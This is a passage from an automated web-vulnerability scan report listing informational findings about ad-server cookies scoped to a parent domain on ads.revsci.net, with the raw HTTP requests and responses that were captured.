DaWCB+bFr3k7XVpbB5qwpNHRkCkZ77/UBJv01pt4XC4DAkfk3Ez7bHArrmb2X25X/l2iGpuYTDqCuAeR1whZ1F0erqLBzvaSriTPduUpkzo8ILLpKXx2R2HDOei+clQOMxb0cM3b4j2LoecLbdBeykr1KInZlRj+7F9LQMTvAHxlfg3BY6u/iHTp0QEKNmfkGRZdVhLGvY7Goafa2yt/lBjKcISAa/c80uQzhksgH6pF0cmHfqP2P02qSFNz6eMJ74hVELzN5l4DAgFOGEv7Yff4YzdAI7OC5bP5U6iQDkFclbNcZuLB/28xD4b5YEtGy2QydMcWl8nIT18I/9KHFpZKfmBXkImm6gFbB2MudKZEtB76izQuckAgZVlJ4V5t9qhXF62TO6EdyPnwlW0lCD85YsJI7JgNDWC95j/iAx5W/1ydJH20DePSoJcp093rdAxL/ln"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8M_3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8M_3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_T3XK="MLsXsqMOripv5xAx2qUcbOIFXR49nM7gHaaGHJKwjQ4IWUcwRphvL8FGdQFLYanC2g9+vTMnyajWtnUbDLMqFPpzLar1wRUIvTGA1uWnfMxyPi99psiNguZT0ea7goHFAR0vX+MQDo54WHIdan+1NeFoKix3snMEHl+VGp6M8XYJj94/03HafRLM2onf1ijEcEkm1/1n/1Voa/Tniz8v5UzWtTOUs5kNcXyd/GxQIVpAwIv6viRMVBPkZdyRACLIEgQUatuVt2Ae3zpe4GOSEjEewrdAUMcRXGXLX70n5i8b9Sv0u97iVrKhlC1xnKQQe5a6sPRlFtqOPMDy3BAiv7EFewMVg8ZPzU7cYMCPBklkv4ntKcK+SH+M+tkUZ/3XElsh2L8ZU+CtExNsv4D9d5ft2sUsmciS+HjMXx4cZb+KFUlxjiT8Rq76Orly4jRJI1+eu6Xnk0EGbYU4IUvgyWIyE5O/F/Vtl5oLf1yhSkGGnAz0YGmIQhOHu7uHLJGD9sgs3xaUDCaYROcKp2d95WhIHyk5XJU1VXNLXgAGrIF0t2hhF4Nt15p2XXGLy5gTwI4huWfe6hJ3VvEBAbOZgkkSDAbY/CE+HdAThs8rnN2HtnEi6wyH6YHWZFILAAWVzIEIlpXu4B9LFNs3NCffLeZGWyerzHFRBn3R2qGLoeSyx+aEw1c5DZA8cyVRQhjZGRYz/TZoAmSEo8GcUNKSiCzEngwZz8P3BtMUYysYM33pD3UKh2NIRTcIvdzeakhX05g/PMtvuHdkTzF4Z0z73WMnTuvcxgoxvtgJlIKXwpzeQO5rW3Dt4sjv8T5n4+zwEg7geTRijjkhb8+2OUUyOPl1ql5SVAR2wzJfUysu1ohjnNTT8CW6m4gb+Wdv1NW2o61rZnglOzK8qhMK0sMpNOvwYqTK4nGlTD0lVG/c5/xjEXtpGILTikdb7674u1J8tB9dhWLnbh4o1D91MzBa3PICDi8A9QHgh45kjFwn93+FC67NCFtGwGZmdI8lePrctV6ymrZSkIDwmq1pwnf9oIzoU9pb6u4mlNnCQGrYeDKqCDtkmUfDZhxEoW+iT0erbDN2xct7ks1KhZB5GJWXdo7WBoQ="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUNNIz9DOAYU1O2W4w6hQni19TpnjEhJR5tpcRY9E+cX+IMnrLQbh8YgXvUvfVOUwUlBtexVpQptyt0WjZvcpGgF9DrAwz3bmQ7kBMeochVw+NcsTyWdIl6bZ1ijruIPGpOOjUOAqaTjhMSvjtr7FNI0UD4r+nDEOLX2Ns14VtgL9v0quPNoZ0Y6FUAxSZUSF0CrmqRKdJ4/1cSVWynKvNy1VQIk6VztqCWfhxqP3qmkR9Hs39oSK2ZziFzzuezxL2RWBeCWVCehsbIjFz/Oprb0Cj6ZwI6sl+2FxEajwbw48lkRdLBbPzNIhVV/jiYJPUIW7X/v75FNHJnsitb8UcPy1z5hKvkE6KdZ0BHROXI3x/Xw3UH2mncF3SxbpOP7Zft4RYTlkAmKcqMS+cdWZ32/1huyXx7NfqctB7AAv87fNfQ8vrdwIpOGfTnpuuh7qlnmBZ2izMISFWX0ZebTb3QPFE7lFvYF3SKZfhkQlQ4XL1myJJ70E2cWE993JUtCR4ZSDzI5iL1ULHXBilqhAGCc5rqD4ahZuhmuhUR03Ai0bAiuIyJypQOIDbdngf/tIRczlpfN/CXCUORMc3NeWJaJP5qWYFWg1fNsEDJ0HpYR1+FdkZiECqLEMK2mPOTB1wtpSDQtoyBeJ2xmALC0mWV84ovLFzgvA4jqVADqQ1hd/JVlGS1FCFeXyONDLmsRjRoaTQptvfeDADZjfnyHf6lRUhwizlcc89ptJAoSVzlbtOXIqeenggNX40qMI7rXbc2BxYFveNmgFDHak3Uv1aahWQUTA37C+/jHID6QBEXvvXL38cgHFdC0+wRBE1/aELPHH6R4iMUPCYDRnuBB7vb4bw8EkraqsFwTCQuECl9FE+xV5gwdL+Zs43PrB8Wbzo32CFjasjNqoLC4uGfrDe3/4OILomh2R7O0wqTgfeQqm7U7MZWjGEQax9tHfZ9cjVmQ2luC27SJVuBpsVgTENVuoPj9sPHf6qy9vpm8naTbKqxVW1cAMIIBLCu+K0hZgKd0wOfnXIPT/o3L5/BDJasT/zE834nGQZEiDMc73DBSMHmvFhhUtPQ7soriuEWCSUEc/3mlWlE6lJa6W+vpPOylHMLQhtRi/k4+QS4b/T2qzfkrXtPM7EOX8E5kcpZ4lhBn3qSU6YMMRWRcnnA15kkxMLL/xv2KuTSep6VDcJ1etS9yehfCU95Fn+6BzaTum6oXu+Baoj6nj+jCThDP24eQcG7J6668Q5C5V9ioIby6Z/2pVWym5N7y2cebaVvAYsvkmyhtvak+KMh7/swxcXXOUc6qT9Vzg0o3Eyge2ar2pSwRwgRF8QiRwgoqc8987XJG7URWAXkE/B2QGaa7NutREe5TZgGZNllTWJMpmqkf5AON5gNY68a/yDZ14hoBw71my+477TqW2pu98Z4yDfMo2rJ8MZjunQYlFN4U7QIqlDYhZW5/M1MOvSIKswzkdwx668cmcpSF7EOIEQZ6nUJ4Lhe5mWoMFg6V+LP6ov9QGG8NX9p5lXhgu2ay1+i8CdQEYk/zO2tVzfbCsKSb5fMgzCHFihXVXVM="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=987677&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:09:50 GMT

12.13. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305609&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_0QhP="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8agCQaitfp6FA0C8r6hsCwn3LMq6VYMHBegA/Z8Ad/QVjxQ2jNsY0ZWD+qEDxiaWPrTwV87vSfczY/tW5l+pH2v6yDAOuX7qLwExVNaXzP2AMt2j6L/eVkJaL8Z3clgZfjZQfsz2Izvu3lvroVB5Qkq5knhep0fRnij2U5Rhz/Vq0pNRMfJgqDntQNUxuwMuKPi/MV/+D5eTiviMqUVLFajotuW5yMfx/XCoKPsB5uFmJ0aEeYdxcSsloefxMiWADTneb8JcFvWYtzJV7goOlW2IZx/Qe7uHD+WE8DohrAg/IzlnQvpZUk/4nt3G7S1d2+FlWbhTTptTyrmqrUJmLu9d0aNbocdAj+G6puSgbaITB3GNtmbmWvWWYkjJUdAu8bWyz1Vxk9EtoZWN3fQ4moqyebnLZSCFznuaZy3XM1MZ/6UPGDGHg0wxwW93Ub4rBq2yDHcsfYbVyvGXzLw+8b+9UUy9zqBvbciwPhJtnEN2oJ+DSWNdng4kQV2z3lppmGNciKPNvEKlkFUGDPVMAtT9lm7UtaNWxCHXgjOtDbRm+CiahJd7NZgrCqRLfB5y//J0Ufw2gwej267ae86TAzxXu2eN6qgF8dcgK67pb0uoIvBvpTfgwi1pcxvPMCci4Vi8mTRD9tCnSNVAoEbX9LWcwaPN2Q7u7zZIF0oXM2p6RhJVeuJefa0PpIftjz0TCJPHRy7zk/lxwmTTLV3ffe8wrI7wgAyuSZxJ9HAJHIAxBzEkzwZWCcYNelk2KyyMGwsgsHyGpeFNI6jLb9IUyzjd7Cykl5KXX0/7MCFYJZEI97vkjpX7jX+GTSxF6d9Kgn6FEOTsU/uJhGmj59St/BrJxgeq94hjxHaiSpeUeJhZrK/iO6EjtDgbxDO8jw3lV7nyksZqm4f+scdCX8kvHizV60UOU0QXvdGsX83/nBssHBisyFjwXrrxi+1Gcg2/RtGxPxb+aVl2g1cE4B7E+LmhICDn/O5CC+8O5HoLPPyA="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+Tw3jzv8rD7yvDmvWDQ0Q8aZIAiDGSo49tlyo/qaXH5wQBQZoGx8vtub+wYEktHO6BM7/uLrdNXC7XGW2RoRccmRQldIeS8HXSTpZFxLggkcDjvNYOoGY5VZbYTnh36BiBOSmypBu+2iq2QDXMLkcK2uHT/C8yL+QzA9VXQB66zprk8rmpiNuQ+aVh/A47qdJNDn8qjknSHNRViyA6Lf9VLCsOvSBW/nO5bs5zsYbyjNLDs0tlY72ojd62XiPpxCcc3uKexC5DTRnhh3dyjVxPGSKlTmvlnr9aGHKHTLVK+Pbf8ptc5PMhhlo0YzcsATzNxrLbRoT3O3q8ARpCvgM02ra6StjkCMXHMHSO08i3XfCPZLjNdRaZogP3Ujafe16GMiz7s91qA4p5CB/lHJr+0KppLU7y9WBhmEa47Ru+ljaZ072rhbhEcmxw9qqLNU/Qhz9Jcu1BKQ80Yxf197S1IJ5HEjQj4x8ot9dp6PtQCbnIte0dkNtJgvyKbqABW/4Y9BTvL9lB5N3cnK0q0eAm7RmvrQsA06FWH3VQOB9HtLNz/xTbZK7hCVXAebPf6jRXHD0nkXRlRjiWS6ey6ODk7jWoiqPWwr+x2FHdnLpzowfuBuaZPFbrr5//T+tJPg0eKuCLr3R4K6PTUqHpej1AArZPQTL6FLqPQT4jVC3KzTCEGa4CaAnHY0Zrqs3d5iDVBUqwlTDxNfC7Ga9LeLy7/TcjcspKJyoaFh/2WC0jsAA3fEz6gj7U8mHA9cZFqj1IA6CoHNofMMWxvZ1EP/MiaMCqu1NxvqRz/nXou9NXXRguDHgUMu+z/yqY7XVxJWePCdb1p/q0Ew6qECQtyV6d8GNEFQloez/xBOOBcaKVasrabhh1mQhT1NABEEl0kGwHC9WuwvD8k5Ecm2g8Ub+8b8xWwawUkMxMLByw5fcEsO9lfN6yIXoK1vxbj/pN0GepXRxh4CCs9Y7SE/BWKnzNyBxrgIJBjNX2fpVDk9Qsy0jVeGn3pOqTP3l4YuJ1ioOHQT1JoRoJIKV4KRQq6Uzfq06fBDaJQf2kAQmgasQb39TGpsoAAZ5fvxckeQEMeOXTASaI1R/+6s3NCrVMLC7QIoUNHB/pGHS/OcquP8g8+avfDQBV+QwQIEjhL6Iy4vOheGZSgcslcOuTo9uMDkQcD4TrVKgsZIcfxEvv59B9klF63vqdAxxVxWmQS/tta5XA0ec/K359cVqOUV61/1Z4ODlvwuT29lxjH3/Y2sHLLMADwAXCR12/hlj15BfplbSqflcwddB3qetl5l4Zp7Z85bCzMG3I2xqoeKfJnKV+bExcZUxDS3oaeHUpFHUs4N5ehhFRt110WtEiM3U8HX32Gj4Hp80Y48x4dEhHIyopb6KyUupuEWF0HYN10tmN/yOvbv3JznYqmx7xBf5dbh1P1aFX/I703GMAJL4bJnpHiTF000ztP6EaHxQuNUeUotUExw=="; rsi_segs_1000000=pUPF5EOhMHIMN9L9XlOlhjCqMTK6hyRPhgO8/StXBMiwvUtfk2+f8pQBVnH6C1XL1Gj8ORJBPU0K18kquspNa2xO16VkbVFmPmFED/ROfss5MyaTFfhDp+yuExR1/a/IX2Hsyr1RynCW3gOqnFCbXsrgMNvCjwrXqmW2SlkxMp41EdMh9G78sGWNa/7GgZLldatK42V74Yg88W1YkZYf4F9AsRF3ZJU9DT1GHinjto6CMfbUZHldNeJBI6Flkjn2aekrtvERgpwmTyxMruLCaTR9t2E+Hj4dpKoaF4RblayFT/zAnvz2zkNwTna5rE/qk7Q+LphTnobN4Hb4fOsR4xMJVxQOqMgY5elWxPq4MbAA4pr9NcZGvV75dLPsz196Bi/xLxZb8iUPsr91zpM4TgqyjuOtnP0lITIukH4pqFfI4PAuqIffOunVFSOU+KJNu9RTMJv3MjLvRTQKWMJzx4Q+yKHmJCBbAPelw0lKw7E1yBNbQD9fS9KaCUyagBuyoH/dxaWYFEq0KJmG+9Dj0/SQE7msZCu6fHMFzfqi; rtc_M6m_=MLvntzM1ZwprJ5GrFviWjmmgATvNNHGJjojTTrWSZIpIFNkYyjZfNBHlcl0kJ6zHfageWylXbP3wSCPbUS6YYjcsKmrQeOUqyKPcaGszTDTzIh7WtzP5n4+zmZZfmgT5lRj+VfPH65chCW295PBHTclwaYvz/SFH1bidheEC6ZRKt9SG9BW8wwNKY4bJJbonQFHtMUTJpFcuSZbz7kTJnxMUL5KgBaHzjRvnrX6SnFrrchfIM5yjshfapwcb2sNQzbZdjBfasru/cAyP1weNriyPKHNATEhqm48Frl0iQ58XID97HW4ZuelkytTr1rC/Y44WWirvX1n4YT+DONi0LYUryUMomW7rJigm4wWq4rIRbkjgSHhZCCWRyQUFwJAV1ID5hI+aJ6aazd6dtbfN39bi3YdtOqXFXtQA1oZ823p8bU8+95SiLREbVMj4r9fvguEqsb6ZiowiD0QHBR5O7YoGrQTtvt49OFBNALY6xCbDvCZRxcd3PwMbMHF9NmAkKTYba8V7HuVRswXCU8FcQcP/VnsVvebZKb0EM1g01x05ERxj/PWvJb23XMUlVENuV3UxjP7/ReTP933hW1beZhIpumclGw06TmVZf/liRMOjCGGidIRNLkCjxr+jn98gJ60DuWa/6oljSYreAox5hf34+wFu4UMrGRoDMmJA7LZ+pzg7HZsRUu2MzWjCkj/8ilLGHSmlL5arTBlslp16GZkGUbdCuQOVlFSnlI9osJ7qHROvOJZhg2kYof7dNriymTDR4d+g5uaoD9DKAtFuCds/Rc7xVtfeQw4QMbnaY4JllnOKqLPOynBZckcstz/Rie4b4P4ftC2ihuu+hh+tb4xtHsHXUPc4S4kcgMoYU6nDhAG17oc8hRuW5vnXQ8mjCFlmg1AikueTXuw9zaFzxcX2n/5AY6b/9CvUk2jTwvfrs1Zd70/ybVtROyX11nYzYcRFBDcu6y63yS0FvWxXhj23zJyQBUyORdmr8TZe9HKLARFqrE0WgqHy3o4bQOGiuinjnlQO6/Tb6EQqtbqScAcGbOoTuOrGyyrrkhQRvhGP5TddNjuCbLxdI6ExyfhSWnMD5gI9RRANVnvfKpeszlgkjMhHO+AI0RAg1Rnrb694FmmSVopIgyGRfYWjkynQNgJu2WFcRVxyqXdKIg1ngWoCjEvDaqGOV5o+mwsP0WqnIOmypaPth6VviROUBdBqnTYbQpKrGdRSH3Wfsh+/t6tYtduD74mjx0Xqm2pq08w5QcKeM1WKgDKkMJ+XdzqfOAnZd82pKBjE4ORwnukNbnOu7MSSwsL9SL6E1m6fnHLOzNMuGy01wnCq/XskooIWiGeIa++XVGFfQXf7PDHd/Ucx2loESlP3R+oaCchKLj4LZFp4NtIXHvyjIXyP99iHRNx2gZf2aM8ryFP+bp9W3EenSlOtdlCd6kjeE5ZKlRwWat6Qd7j1HhdXSiPKFMAZC/MR350YkTLr27YH04gcO6l0Dkc6qJlOHZIyA2wZYJbumg0oQqkm5O5bX8SVTYKyLJBZj57fPCUUFQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0QhP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0QhP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_KnyU="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt57xKhGoM8agCQamtbp6FA0C8r6hsCwn0LMa6VYK+RJFJdSmUgvaZFUEhKeV/lNyFVDTjFDfEdzvor2lDHK10e9qyUjpRsXhu+Khv10rUO1cy3NXmzFcyYbPBb09aMYYjI92uefzrflJpWDkksXImDtnrZMzmWhmqntyZJIYSpuGNnlaKnoyDMN4hkA1MaQmWONQ9SfPCOd+DzWLpzlYElceBfj8Mii5YoPmnpx1l4Hm+KIcDJBS/Jw9qMbxTWDRJpuJ8NSmGa/FNxcNm6IGXP8FtnksMxY20+wv9vrt1nomYYv0F3kosfHVhxjE1us53sGnLZPIF40KwXUmya0xxySzxXennPMhhzaAxEbMAC2oZhlpVpTnYe2VtEa8ouVH8hcd6cMKWHCubzux08ZVAedkGI4h0HYFfb8f7l43JYbHIZVWB1N0yDeJyVCO7uunFuZO3rnXqVFfokpdGxkGHW+VZqIY7/W35uE05p5um7DQciLIFyeYT66olNC9kyJ6mfzxp9PAdxMRkImm0heZ3TRs7+Zmht/siXf1gb0XBvHCY+aPmOceLmEopdjBIUPhwbmcXE8l2x6k2avhD+VhPUocjMvwyg6R8JRmNdBkXUBv8m+CONQeeTyqRoLr31uaCGppO4CdRaD2DZqTlGnmW89vxFRAZPbD1KQvLI3VTelIwQNy1Sn0CwLm7Pcm8J7r4SLfxH8A1XoyUwxfgSucBv7Pu1EUTVplEo4Az3qqjAudfpf9pR6MrGu5WPCsYRlEaJ0C9DlsgmxzylP1sNKSRJyoGkAUzw/uFbasUvOMpyQef8yf2EDiPc8mm1tQgq7nn7+Xqx/pL0cRgQ/+wqg01p9bTmCqvaQ/w5T/K6sFEHIpcxQHzDtIxQEycZosr3qTIeFUD3VzHNqL8OH1kf66vl09b1ktBpOj/LVqpF9rC4BcstIijBOShpSkwZ1iUn1qzJvtT8UqJQ1bH9+gsl0f1gT5QH29SmwJbCwUqenUWdNzHgKd4="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMlIz9DOAYU1O2WA3Nf1wgg9Tpj7P+Tw3jz/8LS/qtrmdrNs/WPSUdnAuxledavN124ASJwVH5lHOqeC4o2fHI9QkQeor8FSjRptD7ENVbUid4nnMBw2upjcbtYuTDvN4rywpZM+lNko5Uk2nK7JHuMGglo8RJ+zavMl5k4QS+ByXHOYJUmot0jFa/RAeaBZWp/5lVDfiO4DCOl8TWjUogUEIlBqKzKxDdiLBDTJPBfPUiGyQcVpITHK+y/KVrz0wpV3qqXjxlJKAxKiws1pQ4d2eeALQw7rizeuIA3XTBP02CnkjOCzewSlIn4ICcjQ3dqrAm47lPCcu5r3CG7ssJ+6ybGZMxstP8Nlg87KkUXGticKQIuBLZ2Tuk0IVlb/WHLQAJfxSM4LoD+9V7nDsImFh2TN07pq5VuZpjOdk8NciCVK+bL6GH2tBGszPgcAmqUQQcf68D6nG4soZhseR6kfG1msnRfIQ6YN4F+QmTV2YQU6qEv2DIcFX4LGKJtyUngsYb2TVBYvzulli9+Qchog8R/Pbu0AobCZyqQzelJI0425PYt10r+1CgqeaNGbN04YVBPkqO3EMZrLjhKcxyk8Y88za1lPcMau1kzTY2gA4JBtaDM5h1v371u9QWA86hBrknU3NaWAHpnOhkvA0d5bzCClzfOR5HDFFURdGkciFWOVneIeDusRkE++AXPlmELHwV5Cq5T7D5ZRR+gZSwM/0Tg8Rf4YUMX4AWl4kbk3U2fysKoA10Lbf1qnkIQO2teVcV2Fu5rcrRq/Vh2GYRGsNBDUUHHbDlXjD4r0Oc0vNXWlCbOpGhgdQKRwkmytvhtJ3xqN38ReBBrpSlij9LNa14JyRwaXtf/MVe4G1pQzlNTlNFVkIch35oqrfFGtY4V9rGR/cES+/EaxrDg6smRtKpyYqy4DlTuHiRPbBaJyJ2m6PwoGbdcSs385mv8bopFIuec0Jbz/9IKa/wYyYNfhFv5v33uvJSN5MTcenode/j2vODUxKQxlGEROKcsJbuTvq607lezL0LNNB5mMi30PlNyanRSr8syPQMdRMAn0wRQoBufya2Ye13EMXiKoOoPCHzt9//8huq4WaUxs6dB8utHb4mWy7/2IGSCE6LrcNkJpYkPy/w2E3BY70eR/7TQGARmNSSlY4Ku9M3cGotjtZzfMXFgZfG7evRnC+c243e973YLpqBO7FittJCdPVYj0uPOeB3Zii5YU6lIciVFSUPcjpD0ZE/qD91uUe2X1yUB/ZDmmlTIll6MqI4RVeseib6AMwY3QXEsGDlZjdpTvkEAYh5cgNStkIGEWSdvDe1ddhjbPviuUwLk3Z4BSCCi8vYQXJ7wnO1TX98vMjmxMGHIkLu0JAdfc+nc3yo3ecvTBAZ4YFacNNVkkOgeYagHMJTcQVP4eD4iBSRsikTKKVit5yOvbvvFzvYrmR7xB/59eNRwl9+TYhab3V9P8Duyapv/ffe06hPnVbSAFh7+FkWRUQQE6g=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 01:13:48 GMT

GIF89a.............!.......,...........D..;
12.14. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; 